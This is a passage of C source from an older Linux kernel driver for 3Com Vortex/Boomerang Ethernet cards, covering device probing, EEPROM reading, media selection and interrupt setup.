*/ s32 status; u32 addr; /* Up to 63 addr/len pairs possible. */ s32 length; /* Set LAST_FRAG to indicate last pair. */ }; /* Values for the Rx status entry. */ enum rx_desc_status { RxDComplete=0x00008000, RxDError=0x4000, /* See boomerang_rx() for actual error bits */ IPChksumErr=1<<25, TCPChksumErr=1<<26, UDPChksumErr=1<<27, IPChksumValid=1<<29, TCPChksumValid=1<<30, UDPChksumValid=1<<31, }; struct boom_tx_desc { u32 next; /* Last entry points to 0. */ s32 status; /* bits 0:12 length, others see below. */ u32 addr; s32 length; }; /* Values for the Tx status entry. */ enum tx_desc_status { CRCDisable=0x2000, TxDComplete=0x8000, AddIPChksum=0x02000000, AddTCPChksum=0x04000000, AddUDPChksum=0x08000000, TxIntrUploaded=0x80000000, /* IRQ when in FIFO, but maybe not sent. */ }; /* Chip features we care about in vp->capabilities, read from the EEPROM. */ enum ChipCaps { CapBusMaster=0x20, CapPwrMgmt=0x2000 }; struct vortex_private { /* The Rx and Tx rings should be quad-word-aligned. */ struct boom_rx_desc* rx_ring; struct boom_tx_desc* tx_ring; dma_addr_t rx_ring_dma; dma_addr_t tx_ring_dma; /* The addresses of transmit- and receive-in-place skbuffs. */ struct sk_buff* rx_skbuff[RX_RING_SIZE]; struct sk_buff* tx_skbuff[TX_RING_SIZE]; struct net_device *next_module; /* NULL if PCI device */ unsigned int cur_rx, cur_tx; /* The next free ring entry */ unsigned int dirty_rx, dirty_tx; /* The ring entries to be free()ed. */ struct net_device_stats stats; struct sk_buff *tx_skb; /* Packet being eaten by bus master ctrl. */ dma_addr_t tx_skb_dma; /* Allocated DMA address for bus master ctrl DMA. */ /* PCI configuration space information. */ struct pci_dev *pdev; char *cb_fn_base; /* CardBus function status addr space. */ /* The remainder are related to chip state, mostly media selection. */ struct timer_list timer; /* Media selection timer. */ int options; /* User-settable misc. driver options. */ unsigned int media_override:4, /* Passed-in media type. 
*/ default_media:4, /* Read from the EEPROM/Wn3_Config. */ full_duplex:1, force_fd:1, autoselect:1, bus_master:1, /* Vortex can only do a fragment bus-m. */ full_bus_master_tx:1, full_bus_master_rx:2, /* Boomerang */ hw_csums:1, /* Has hardware checksums. */ tx_full:1, has_nway:1, open:1; int tx_reset_resume; /* Flag to restart timer after vortex_error handling */ u16 status_enable; u16 intr_enable; u16 available_media; /* From Wn3_Options. */ u16 capabilities, info1, info2; /* Various, from EEPROM. */ u16 advertising; /* NWay media advertisement */ unsigned char phys[2]; /* MII device addresses. */ u16 deferred; /* Resend these interrupts when we * bail from the ISR */ u16 io_size; /* Size of PCI region (for release_region) */ spinlock_t lock; }; /* The action to take with a media selection timer tick. Note that we deviate from the 3Com order by checking 10base2 before AUI. */ enum xcvr_types { XCVR_10baseT=0, XCVR_AUI, XCVR_10baseTOnly, XCVR_10base2, XCVR_100baseTx, XCVR_100baseFx, XCVR_MII=6, XCVR_NWAY=8, XCVR_ExtMII=9, XCVR_Default=10, }; static struct media_table { char *name; unsigned int media_bits:16, /* Bits to set in Wn4_Media register. */ mask:8, /* The transceiver-present bit in Wn3_Config.*/ next:8; /* The media type to try next. */ int wait; /* Time before we check media status.
*/ } media_tbl[] = { { "10baseT", Media_10TP,0x08, XCVR_10base2, (14*HZ)/10}, { "10Mbs AUI", Media_SQE, 0x20, XCVR_Default, (1*HZ)/10}, { "undefined", 0, 0x80, XCVR_10baseT, 10000}, { "10base2", 0, 0x10, XCVR_AUI, (1*HZ)/10}, { "100baseTX", Media_Lnk, 0x02, XCVR_100baseFx, (14*HZ)/10}, { "100baseFX", Media_Lnk, 0x04, XCVR_MII, (14*HZ)/10}, { "MII", 0, 0x41, XCVR_10baseT, 3*HZ }, { "undefined", 0, 0x01, XCVR_10baseT, 10000}, { "Autonegotiate", 0, 0x41, XCVR_10baseT, 3*HZ}, { "MII-External", 0, 0x41, XCVR_10baseT, 3*HZ }, { "Default", 0, 0xFF, XCVR_10baseT, 10000}, }; static int vortex_probe1(struct pci_dev *pdev, long ioaddr, int irq, int chip_idx, int card_idx); static void vortex_up(struct net_device *dev); static void vortex_down(struct net_device *dev); static int vortex_open(struct net_device *dev); static void mdio_sync(long ioaddr, int bits); static int mdio_read(long ioaddr, int phy_id, int location); static void mdio_write(long ioaddr, int phy_id, int location, int value); static void vortex_timer(unsigned long arg); static int vortex_start_xmit(struct sk_buff *skb, struct net_device *dev); static int boomerang_start_xmit(struct sk_buff *skb, struct net_device *dev); static int vortex_rx(struct net_device *dev); static int boomerang_rx(struct net_device *dev); static void vortex_interrupt(int irq, void *dev_id, struct pt_regs *regs); static void boomerang_interrupt(int irq, void *dev_id, struct pt_regs *regs); static int vortex_close(struct net_device *dev); static void dump_tx_ring(struct net_device *dev); static void update_stats(long ioaddr, struct net_device *dev); static struct net_device_stats *vortex_get_stats(struct net_device *dev); static void set_rx_mode(struct net_device *dev); static int vortex_ioctl(struct net_device *dev, struct ifreq *rq, int cmd); static void vortex_tx_timeout(struct net_device *dev); static void acpi_set_WOL(struct net_device *dev); /* This driver uses 'options' to pass the media type, full-duplex flag, etc. 
*/ /* Option count limit only -- unlimited interfaces are supported. */ #define MAX_UNITS 8 static int options[MAX_UNITS] = { -1, -1, -1, -1, -1, -1, -1, -1,}; static int full_duplex[MAX_UNITS] = {-1, -1, -1, -1, -1, -1, -1, -1}; /* A list of all installed Vortex EISA devices, for removing the driver module. */ static struct net_device *root_vortex_eisa_dev = NULL; /* Variables to work-around the Compaq PCI BIOS32 problem. */ static int compaq_ioaddr = 0, compaq_irq = 0, compaq_device_id = 0x5900; static int vortex_cards_found = 0; static void vortex_suspend (struct pci_dev *pdev) { struct net_device *dev = pdev->driver_data; printk(KERN_DEBUG "vortex_suspend(%s)\n", dev->name); if (dev && dev->priv) { struct vortex_private *vp = (struct vortex_private *)dev->priv; if (vp->open) { netif_device_detach(dev); vortex_down(dev); } } } static void vortex_resume (struct pci_dev *pdev) { struct net_device *dev = pdev->driver_data; printk(KERN_DEBUG "vortex_resume(%s)\n", dev->name); if (dev && dev->priv) { struct vortex_private *vp = (struct vortex_private *)dev->priv; if (vp->open) { vortex_up(dev); netif_device_attach(dev); } } } /* returns count found (>= 0), or negative on error */ static int __init vortex_eisa_init (void) { long ioaddr; int rc; int orig_cards_found = vortex_cards_found; /* Now check all slots of the EISA bus. */ if (!EISA_bus) return 0; for (ioaddr = 0x1000; ioaddr < 0x9000; ioaddr += 0x1000) { int device_id; if (request_region(ioaddr, VORTEX_TOTAL_SIZE, "vortex") == NULL) continue; /* Check the standard EISA ID register for an encoded '3Com'. */ if (inw(ioaddr + 0xC80) != 0x6d50) { release_region (ioaddr, VORTEX_TOTAL_SIZE); continue; } /* Check for a product that we support, 3c59{2,7} any rev. 
*/ device_id = (inb(ioaddr + 0xC82)<<8) + inb(ioaddr + 0xC83); if ((device_id & 0xFF00) != 0x5900) { release_region (ioaddr, VORTEX_TOTAL_SIZE); continue; } rc = vortex_probe1(NULL, ioaddr, inw(ioaddr + 0xC88) >> 12, EISA_TBL_OFFSET, vortex_cards_found); if (rc == 0) vortex_cards_found++; else release_region (ioaddr, VORTEX_TOTAL_SIZE); } /* Special code to work-around the Compaq PCI BIOS32 problem. */ if (compaq_ioaddr) { vortex_probe1(NULL, compaq_ioaddr, compaq_irq, compaq_device_id, vortex_cards_found++); } return vortex_cards_found - orig_cards_found; } /* returns count (>= 0), or negative on error */ static int __devinit vortex_init_one (struct pci_dev *pdev, const struct pci_device_id *ent) { int rc; rc = vortex_probe1 (pdev, pci_resource_start (pdev, 0), pdev->irq, ent->driver_data, vortex_cards_found); if (rc == 0) vortex_cards_found++; return rc; } /* * Start up the PCI device which is described by *pdev. * Return 0 on success. * * NOTE: pdev can be NULL, for the case of an EISA driver */ static int __devinit vortex_probe1(struct pci_dev *pdev, long ioaddr, int irq, int chip_idx, int card_idx) { struct vortex_private *vp; int option; unsigned int eeprom[0x40], checksum = 0; /* EEPROM contents */ int i; struct net_device *dev; static int printed_version = 0; int retval; if (!printed_version) { printk (KERN_INFO "%s", version); printed_version = 1; } dev = init_etherdev(NULL, sizeof(*vp)); if (!dev) { printk (KERN_ERR PFX "unable to allocate etherdev, aborting\n"); retval = -ENOMEM; goto out; } printk(KERN_INFO "%s: 3Com %s %s at 0x%lx, ", dev->name, pdev ? "PCI" : "EISA", vortex_info_tbl[chip_idx].name, ioaddr); /* private struct aligned and zeroed by init_etherdev */ vp = dev->priv; dev->base_addr = ioaddr; dev->irq = irq; dev->mtu = mtu; vp->has_nway = (vortex_info_tbl[chip_idx].drv_flags & HAS_NWAY) ? 
1 : 0; vp->io_size = vortex_info_tbl[chip_idx].io_size; /* module list only for EISA devices */ if (pdev == NULL) { vp->next_module = root_vortex_eisa_dev; root_vortex_eisa_dev = dev; } /* PCI-only startup logic */ if (pdev) { /* EISA resources already marked, so only PCI needs to do this here */ if (!request_region (ioaddr, vortex_info_tbl[chip_idx].io_size, dev->name)) { printk (KERN_ERR "%s: Cannot reserve I/O resource 0x%x @ 0x%lx, aborting\n", dev->name, vortex_info_tbl[chip_idx].io_size, ioaddr); retval = -EBUSY; goto free_dev; } /* wake up and enable device */ if (pci_enable_device (pdev)) { retval = -EIO; goto free_region; } /* enable bus-mastering if necessary */ if (vortex_info_tbl[chip_idx].flags & PCI_USES_MASTER) pci_set_master (pdev); } vp->lock = SPIN_LOCK_UNLOCKED; vp->pdev = pdev; /* Makes sure rings are at least 16 byte aligned. */ vp->rx_ring = pci_alloc_consistent(pdev, sizeof(struct boom_rx_desc) * RX_RING_SIZE + sizeof(struct boom_tx_desc) * TX_RING_SIZE, &vp->rx_ring_dma); if (vp->rx_ring == 0) { retval = -ENOMEM; goto free_region; } vp->tx_ring = (struct boom_tx_desc *)(vp->rx_ring + RX_RING_SIZE); vp->tx_ring_dma = vp->rx_ring_dma + sizeof(struct boom_rx_desc) * RX_RING_SIZE; /* if we are a PCI driver, we store info in pdev->driver_data * instead of a module list */ if (pdev) pdev->driver_data = dev; /* The lower four bits are the media type. */ if (dev->mem_start) { /* * AKPM: ewww.. The 'options' param is passed in as the third arg to the * LILO 'ether=' argument for non-modular use */ option = dev->mem_start; } else if (card_idx < MAX_UNITS) option = options[card_idx]; else option = -1; if (option >= 0) { vp->media_override = ((option & 7) == 2) ? 0 : option & 15; vp->full_duplex = (option & 0x200) ? 1 : 0; vp->bus_master = (option & 16) ? 
1 : 0; } else { vp->media_override = 7; vp->full_duplex = 0; vp->bus_master = 0; } if (card_idx < MAX_UNITS && full_duplex[card_idx] > 0) vp->full_duplex = 1; vp->force_fd = vp->full_duplex; vp->options = option; /* Read the station address from the EEPROM. */ EL3WINDOW(0); { int base = (vortex_info_tbl[chip_idx].drv_flags & EEPROM_230) ? 0x230 : EEPROM_Read; for (i = 0; i < 0x40; i++) { int timer; outw(base + i, ioaddr + Wn0EepromCmd); /* Pause for at least 162 us. for the read to take place. */ for (timer = 10; timer >= 0; timer--) { udelay(162); if ((inw(ioaddr + Wn0EepromCmd) & 0x8000) == 0) break; } eeprom[i] = inw(ioaddr + Wn0EepromData); } } for (i = 0; i < 0x18; i++) checksum ^= eeprom[i]; checksum = (checksum ^ (checksum >> 8)) & 0xff; if (checksum != 0x00) { /* Grrr, needless incompatible change 3Com. */ while (i < 0x21) checksum ^= eeprom[i++]; checksum = (checksum ^ (checksum >> 8)) & 0xff; } if (checksum != 0x00) printk(" ***INVALID CHECKSUM %4.4x*** ", checksum); for (i = 0; i < 3; i++) ((u16 *)dev->dev_addr)[i] = htons(eeprom[i + 10]); for (i = 0; i < 6; i++) printk("%c%2.2x", i ? ':' : ' ', dev->dev_addr[i]); EL3WINDOW(2); for (i = 0; i < 6; i++) outb(dev->dev_addr[i], ioaddr + i); #ifdef __sparc__ printk(", IRQ %s\n", __irq_itoa(dev->irq)); #else printk(", IRQ %d\n", dev->irq); /* Tell them about an invalid IRQ. */ if (vortex_debug && (dev->irq <= 0 || dev->irq >= NR_IRQS)) printk(KERN_WARNING " *** Warning: IRQ %d is unlikely to work! 
***\n", dev->irq); #endif if (pdev && vortex_info_tbl[chip_idx].drv_flags & HAS_CB_FNS) { u32 fn_st_addr; /* Cardbus function status space */ fn_st_addr = pci_resource_start (pdev, 2); if (fn_st_addr) vp->cb_fn_base = ioremap(fn_st_addr, 128); printk(KERN_INFO "%s: CardBus functions mapped %8.8x->%p\n", dev->name, fn_st_addr, vp->cb_fn_base); #if 1 /* AKPM: the 575_cb and 905B LEDs seem OK without this */ if (vortex_pci_tbl[chip_idx].device != 0x5257) { EL3WINDOW(2); outw(0x10 | inw(ioaddr + Wn2_ResetOptions), ioaddr + Wn2_ResetOptions); } #endif } /* Extract our information from the EEPROM data. */ vp->info1 = eeprom[13]; vp->info2 = eeprom[15]; vp->capabilities = eeprom[16]; if (vp->info1 & 0x8000) { vp->full_duplex = 1; printk(KERN_INFO "Full duplex capable\n"); } { static const char * ram_split[] = {"5:3", "3:1", "1:1", "3:5"}; union wn3_config config; EL3WINDOW(3); vp->available_media = inw(ioaddr + Wn3_Options); if ((vp->available_media & 0xff) == 0) /* Broken 3c916 */ vp->available_media = 0x40; config.i = inl(ioaddr + Wn3_Config); if (vortex_debug > 1) printk(KERN_DEBUG " Internal config register is %4.4x, " "transceivers %#x.\n", config.i, inw(ioaddr + Wn3_Options)); printk(KERN_INFO " %dK %s-wide RAM %s Rx:Tx split, %s%s interface.\n", 8 << config.u.ram_size, config.u.ram_width ? "word" : "byte", ram_split[config.u.ram_split], config.u.autoselect ? "autoselect/" : "", config.u.xcvr > XCVR_ExtMII ? 
"" : media_tbl[config.u.xcvr].name); vp->default_media = config.u.xcvr; vp->autoselect = config.u.autoselect; } if (vp->media_override != 7) { printk(KERN_INFO " Media override to transceiver type %d (%s).\n", vp->media_override, media_tbl[vp->media_override].name); dev->if_port = vp->media_override; } else dev->if_port = vp->default_media; if (dev->if_port == XCVR_MII || dev->if_port == XCVR_NWAY) { int phy, phy_idx = 0; EL3WINDOW(4); mii_preamble_required++; mii_preamble_required++; mdio_read(ioaddr, 24, 1); for (phy = 1; phy <= 32 && phy_idx < sizeof(vp->phys); phy++) { int mii_status, phyx = phy & 0x1f; mii_status = mdio_read(ioaddr, phyx, 1); if (mii_status && mii_status != 0xffff) { vp->phys[phy_idx++] = phyx; printk(KERN_INFO " MII transceiver found at address %d," " status %4x.\n", phyx, mii_status); if ((mii_status & 0x0040) == 0) mii_preamble_required++; } } mii_preamble_required--; if (phy_idx == 0) { printk(KERN_WARNING" ***WARNING*** No MII transceivers found!\n"); vp->phys[0] = 24; } else { vp->advertising = mdio_read(ioaddr, vp->phys[0], 4); if (vp->full_duplex) { /* Only advertise the FD media types. */ vp->advertising &= ~0x02A0; mdio_write(ioaddr, vp->phys[0], 4, vp->advertising); } } } if (vp->capabilities & CapPwrMgmt) acpi_set_WOL(dev); if (vp->capabilities & CapBusMaster) { vp->full_bus_master_tx = 1; printk(KERN_INFO" Enabling bus-master transmits and %s receives.\n", (vp->info2 & 1) ? "early" : "whole-frame" ); vp->full_bus_master_rx = (vp->info2 & 1) ? 1 : 2; vp->bus_master = 0; /* AKPM: vortex only */ } /* The 3c59x-specific entries in the device structure. 
*/ dev->open = &vortex_open; dev->hard_start_xmit = &vortex_start_xmit; dev->stop = &vortex_close; dev->get_stats = &vortex_get_stats; dev->do_ioctl = &vortex_ioctl; dev->set_multicast_list = &set_rx_mode; dev->tx_timeout = &vortex_tx_timeout; dev->watchdog_timeo = TX_TIMEOUT; return 0; free_region: release_region (ioaddr, vortex_info_tbl[chip_idx].io_size); free_dev: unregister_netdev(dev); kfree (dev); printk(KERN_ERR PFX "vortex_probe1 fails. Returns %d\n", retval); out: return retval; } static void wait_for_completion(struct net_device *dev, int cmd) { int i = 4000; outw(cmd, dev->base_addr + EL3_CMD); while (--i > 0) { if (!(inw(dev->base_addr + EL3_STATUS) & CmdInProgress)) return; } printk(KERN_ERR "%s: command 0x%04x did not complete! Status=0x%x\n", dev->name, cmd, inw(dev->base_addr + EL3_STATUS)); } static void vortex_up(struct net_device *dev) { long ioaddr = dev->base_addr; struct vortex_private *vp = (struct vortex_private *)dev->priv; union wn3_config config; int i, device_id; if (vp->pdev) device_id = vp->pdev->device; else device_id = 0x5900; /* EISA */ /* Before initializing select the active media port. */ EL3WINDOW(3); config.i = inl(ioaddr + Wn3_Config); if (vp->media_override != 7) { if (vortex_debug > 1) printk(KERN_INFO "%s: Media override to transceiver %d (%s).\n", dev->name, vp->media_override, media_tbl[vp->media_override].name); dev->if_port = vp->media_override; } else if (vp->autoselect) { if (vp->has_nway) { printk(KERN_INFO "%s: using NWAY autonegotiation\n", dev->name); dev->if_port = XCVR_NWAY; } else { /* Find first available media type, starting with 100baseTx. */ dev->if_port = XCVR_100baseTx; while (! 
(vp->available_media & media_tbl[dev->if_port].mask)) dev->if_port = media_tbl[dev->if_port].next; printk(KERN_INFO "%s: first available media type: %s\n", dev->name, media_tbl[dev->if_port].name); } } else { dev->if_port = vp->default_media; printk(KERN_INFO "%s: using default media %s\n", dev->name, media_tbl[dev->if_port].name); } init_timer(&vp->timer); vp->timer.expires = RUN_AT(TX_EXPIRE); // vp->timer.expires = RUN_AT(media_tbl[dev->if_port].wait); vp->timer.data = (unsigned long)dev; vp->timer.function = &vortex_timer; /* timer handler */ add_timer(&vp->timer); if (vortex_debug > 1) printk(KERN_DEBUG "%s: Initial media type %s.\n", dev->name, media_tbl[dev->if_port].name); vp->full_duplex = vp->force_fd; config.u.xcvr = dev->if_port; //AKPM if (!vp->has_nway) { if (vortex_debug > 6) printk(KERN_DEBUG "vortex_up(): writing 0x%x to InternalConfig\n", config.i); outl(config.i, ioaddr + Wn3_Config); } if (dev->if_port == XCVR_MII || dev->if_port == XCVR_NWAY) { int mii_reg1, mii_reg5; EL3WINDOW(4); /* Read BMSR (reg1) only to clear old status. */ mii_reg1 = mdio_read(ioaddr, vp->phys[0], 1); mii_reg5 = mdio_read(ioaddr, vp->phys[0], 5); if (mii_reg5 == 0xffff || mii_reg5 == 0x0000) netif_carrier_off(dev);/* No MII device or no link partner report */ else { netif_carrier_on(dev); if ((mii_reg5 & 0x0100) != 0 /* 100baseTx-FD */ || (mii_reg5 & 0x00C0) == 0x0040) /* 10T-FD, but not 100-HD */ vp->full_duplex = 1; } if (vortex_debug > 1) printk(KERN_INFO "%s: MII #%d status %4.4x, link partner capability %4.4x," " setting %s-duplex.\n", dev->name, vp->phys[0], mii_reg1, mii_reg5, vp->full_duplex ? "full" : "half"); EL3WINDOW(3); } /* Set the full-duplex bit. */ outb(((vp->info1 & 0x8000) || vp->full_duplex ? 0x20 : 0) | (dev->mtu > 1500 ? 
0x40 : 0), ioaddr + Wn3_MAC_Ctrl); if (vortex_debug > 1) { printk(KERN_DEBUG "%s: vortex_up() InternalConfig %8.8x.\n", dev->name, config.i); } wait_for_completion(dev, TxReset); wait_for_completion(dev, RxReset); outw(SetStatusEnb | 0x00, ioaddr + EL3_CMD); if (vortex_debug > 1) { EL3WINDOW(4); printk(KERN_DEBUG "%s: vortex_up() irq %d media status %4.4x.\n", dev->name, dev->irq, inw(ioaddr + Wn4_Media)); } /* Set the station address and mask in window 2 each time opened. */ EL3WINDOW(2); for (i = 0; i < 6; i++) outb(dev->dev_addr[i], ioaddr + i); for (; i < 12; i+=2) outw(0, ioaddr + i); if (vp->cb_fn_base) { u_short n = inw(ioaddr + Wn2_ResetOptions); #if 0 /* AKPM: This is done in vortex_probe1, and seems to be wrong anyway... */ /* Inverted LED polarity */ if (device_id != 0x5257) n |= 0x0010; #endif /* Inverted polarity of MII power bit */ if ((device_id == 0x6560) || (device_id == 0x6562) || (device_id == 0x5257)) n |= 0x4000; outw(n, ioaddr + Wn2_ResetOptions); } if (dev->if_port == XCVR_10base2) /* Start the thinnet transceiver. We should really wait 50ms...*/ outw(StartCoax, ioaddr + EL3_CMD); if (dev->if_port != XCVR_NWAY) { EL3WINDOW(4); outw((inw(ioaddr + Wn4_Media) & ~(Media_10TP|Media_SQE)) | media_tbl[dev->if_port].media_bits, ioaddr + Wn4_Media); } /* Switch to the stats window, and clear all stats by reading. */ outw(StatsDisable, ioaddr + EL3_CMD); EL3WINDOW(6); for (i = 0; i < 10; i++) inb(ioaddr + i); inw(ioaddr + 10); inw(ioaddr + 12); /* New: On the Vortex we must also clear the BadSSD counter. */ EL3WINDOW(4); inb(ioaddr + 12); /* ..and on the Boomerang we enable the extra statistics bits. */ outw(0x0040, ioaddr + Wn4_NetDiag); /* Switch to register set 7 for normal use. */ EL3WINDOW(7); if (vp->full_bus_master_rx) { /* Boomerang bus master. */ vp->cur_rx = vp->dirty_rx = 0; /* Initialize the RxEarly register as recommended. 
*/ outw(SetRxThreshold + (1536>>2), ioaddr + EL3_CMD); outl(0x0020, ioaddr + PktStatus); outl(vp->rx_ring_dma, ioaddr + UpListPtr); } if (vp->full_bus_master_tx) { /* Boomerang bus master Tx. */ dev->hard_start_xmit = &boomerang_start_xmit; vp->cur_tx = vp->dirty_tx = 0; outb(PKT_BUF_SZ>>8, ioaddr + TxFreeThreshold); /* Room for a packet. */ /* Clear the Rx, Tx rings. */ for (i = 0; i < RX_RING_SIZE; i++) /* AKPM: this is done in vortex_open, too */ vp->rx_ring[i].status = 0; for (i = 0; i < TX_RING_SIZE; i++) vp->tx_skbuff[i] = 0; outl(0, ioaddr + DownListPtr); } /* Set receiver mode: presumably accept b-case and phys addr only. */ set_rx_mode(dev); outw(StatsEnable, ioaddr + EL3_CMD); /* Turn on statistics. */ netif_start_queue (dev); outw(RxEnable, ioaddr + EL3_CMD); /* Enable the receiver. */ outw(TxEnable, ioaddr + EL3_CMD); /* Enable transmitter. */ /* Allow status bits to be seen. */ vp->status_enable = SetStatusEnb | HostError|IntReq|StatsFull|TxComplete| (vp->full_bus_master_tx ? DownComplete : TxAvailable) | (vp->full_bus_master_rx ? UpComplete : RxComplete) | (vp->bus_master ? DMADone : 0); vp->intr_enable = SetIntrEnb | IntLatch | TxAvailable | (vp->full_bus_master_rx ? 0 : RxComplete) | StatsFull | HostError | TxComplete | IntReq | (vp->bus_master ? DMADone : 0) | UpComplete | DownComplete; outw(vp->status_enable, ioaddr + EL3_CMD); /* Ack all pending events, and set active indicator mask. */ outw(AckIntr | IntLatch | TxAvailable | RxEarly | IntReq, ioaddr + EL3_CMD); outw(vp->intr_enable, ioaddr + EL3_CMD); if (vp->cb_fn_base) /* The PCMCIA people are idiots. 
*/ writel(0x8000, vp->cb_fn_base + 4); if (extra_reset) { /* AKPM: unjam the 3CCFE575CT */ wait_for_completion(dev, TxReset); if (vp->full_bus_master_tx) { outb(PKT_BUF_SZ>>8, ioaddr + TxFreeThreshold); outw(DownUnstall, ioaddr + EL3_CMD); } outw(TxEnable, ioaddr + EL3_CMD); } } static int vortex_open(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; int i; int retval; MOD_INC_USE_COUNT; /* Use the now-standard shared IRQ implementation. */ if (request_irq(dev->irq, vp->full_bus_master_rx ? &boomerang_interrupt : &vortex_interrupt, SA_SHIRQ, dev->name, dev)) { retval = -EAGAIN; goto out; } if (vp->full_bus_master_rx) { /* Boomerang bus master. */ if (vortex_debug > 2) printk(KERN_DEBUG "%s: Filling in the Rx ring.\n", dev->name); for (i = 0; i < RX_RING_SIZE; i++) { struct sk_buff *skb; vp->rx_ring[i].next = cpu_to_le32(vp->rx_ring_dma + sizeof(struct boom_rx_desc) * (i+1)); vp->rx_ring[i].status = 0; /* Clear complete bit. */ vp->rx_ring[i].length = cpu_to_le32(PKT_BUF_SZ | LAST_FRAG); skb = dev_alloc_skb(PKT_BUF_SZ); vp->rx_skbuff[i] = skb; if (skb == NULL) break; /* Bad news! */ skb->dev = dev; /* Mark as being used by this device. */ skb_reserve(skb, 2); /* Align IP on 16 byte boundaries */ vp->rx_ring[i].addr = cpu_to_le32(pci_map_single(vp->pdev, skb->tail, PKT_BUF_SZ, PCI_DMA_FROMDEVICE)); } /* Wrap the ring. 
*/ vp->rx_ring[i-1].next = cpu_to_le32(vp->rx_ring_dma); } vortex_up(dev); vp->open = 1; return 0; out: MOD_DEC_USE_COUNT; if (vortex_debug > 1) printk(KERN_ERR PFX "vortex_open() fails: returning %d\n", retval); return retval; } static void vortex_timer(unsigned long data) { struct net_device *dev = (struct net_device *)data; struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; int next_tick = TX_EXPIRE; int ok = 0; int media_status, mii_status, old_window; if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media selection timer tick happened, %s.\n", dev->name, media_tbl[dev->if_port].name); disable_irq(dev->irq); old_window = inw(ioaddr + EL3_CMD) >> 13; EL3WINDOW(4); media_status = inw(ioaddr + Wn4_Media); switch (dev->if_port) { case XCVR_10baseT: case XCVR_100baseTx: case XCVR_100baseFx: if (media_status & Media_LnkBeat) { ok = 1; netif_carrier_on(dev); if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media %s has link beat, %x.\n", dev->name, media_tbl[dev->if_port].name, media_status); } else { netif_carrier_off(dev); if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media %s has no link beat, %x.\n", dev->name, media_tbl[dev->if_port].name, media_status); } break; case XCVR_MII: case XCVR_NWAY: { unsigned long flags; spin_lock_irqsave(&vp->lock, flags); /* AKPM: protect mdio state */ if (media_status & Media_LnkBeat) { netif_carrier_on(dev); } else { netif_carrier_off(dev); } mii_status = mdio_read(ioaddr, vp->phys[0], 1); ok = 1; if (vortex_debug > 1) printk(KERN_DEBUG "%s: MII transceiver has status %4.4x.\n", dev->name, mii_status); if (mii_status & 0x0004) { int mii_reg5 = mdio_read(ioaddr, vp->phys[0], 5); if (! vp->force_fd && mii_reg5 != 0xffff) { int duplex = (mii_reg5&0x0100) || (mii_reg5 & 0x01C0) == 0x0040; if (vp->full_duplex != duplex) { vp->full_duplex = duplex; printk(KERN_INFO "%s: Setting %s-duplex based on MII " "#%d link partner capability of %4.4x.\n", dev->name, vp->full_duplex ? 
"full" : "half", vp->phys[0], mii_reg5); /* Set the full-duplex bit. */ EL3WINDOW(3); /* AKPM: this was missing from 2.3.99 3c59x.c! */ outb((vp->full_duplex ? 0x20 : 0) | (dev->mtu > 1500 ? 0x40 : 0), ioaddr + Wn3_MAC_Ctrl); if (vortex_debug > 1) printk(KERN_DEBUG "Setting duplex in Wn3_MAC_Ctrl\n"); /* AKPM: bug: should reset Tx and Rx after setting Duplex. Page 180 */ } next_tick = TX_EXPIRE; } } spin_unlock_irqrestore(&vp->lock, flags); } break; default: /* Other media types handled by Tx timeouts. */ if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media %s has no indication, %x.\n", dev->name, media_tbl[dev->if_port].name, media_status); ok = 1; } if ( ! ok) { union wn3_config config; do { dev->if_port = media_tbl[dev->if_port].next; } while ( ! (vp->available_media & media_tbl[dev->if_port].mask)); if (dev->if_port == XCVR_Default) { /* Go back to default. */ dev->if_port = vp->default_media; if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media selection failing, using default " "%s port.\n", dev->name, media_tbl[dev->if_port].name); } else { if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media selection failed, now trying " "%s port.\n", dev->name, media_tbl[dev->if_port].name); next_tick = TX_EXPIRE; // next_tick = media_tbl[dev->if_port].wait; } outw((media_status & ~(Media_10TP|Media_SQE)) | media_tbl[dev->if_port].media_bits, ioaddr + Wn4_Media); EL3WINDOW(3); config.i = inl(ioaddr + Wn3_Config); config.u.xcvr = dev->if_port; outl(config.i, ioaddr + Wn3_Config); outw(dev->if_port == XCVR_10base2 ? StartCoax : StopCoax, ioaddr + EL3_CMD); if (vortex_debug > 1) printk(KERN_DEBUG "wrote 0x%08x to Wn3_Config\n", config.i); /* AKPM: FIXME: Should reset Rx & Tx here. 
P60 of 3c90xc.pdf */ } EL3WINDOW(old_window); enable_irq(dev->irq); if (vortex_debug > 1) printk(KERN_DEBUG "%s: Media selection timer finished, %s.\n", dev->name, media_tbl[dev->if_port].name); vp->timer.expires = RUN_AT(next_tick); add_timer(&vp->timer); if (vp->deferred) outw(FakeIntr, ioaddr + EL3_CMD); return; } static void vortex_tx_timeout(struct net_device *dev) { struct vortex_private *vp = (struct vortex_private *)dev->priv; long ioaddr = dev->base_addr; printk(KERN_ERR "%s: transmit timed out, tx_status %2.2x status %4.4x.\n", dev->name, inb(ioaddr + TxStatus), inw(ioaddr + EL3_STATUS)); /* Slight code bloat to be user friendly. */ if ((inb(ioaddr + TxStatus) & 0x88) == 0x88) printk(KERN_ERR "%s: Transmitter encountered 16 collisions --" " network cable problem?\n", dev->name); if (inw(ioaddr + EL3_STATUS) & IntLatch) { printk(KERN_ERR "%s: Interrupt posted but not delivered --" " IRQ blocked by another device?\n", dev->name); /* Bad idea here.. but we might as well handle a few events. 
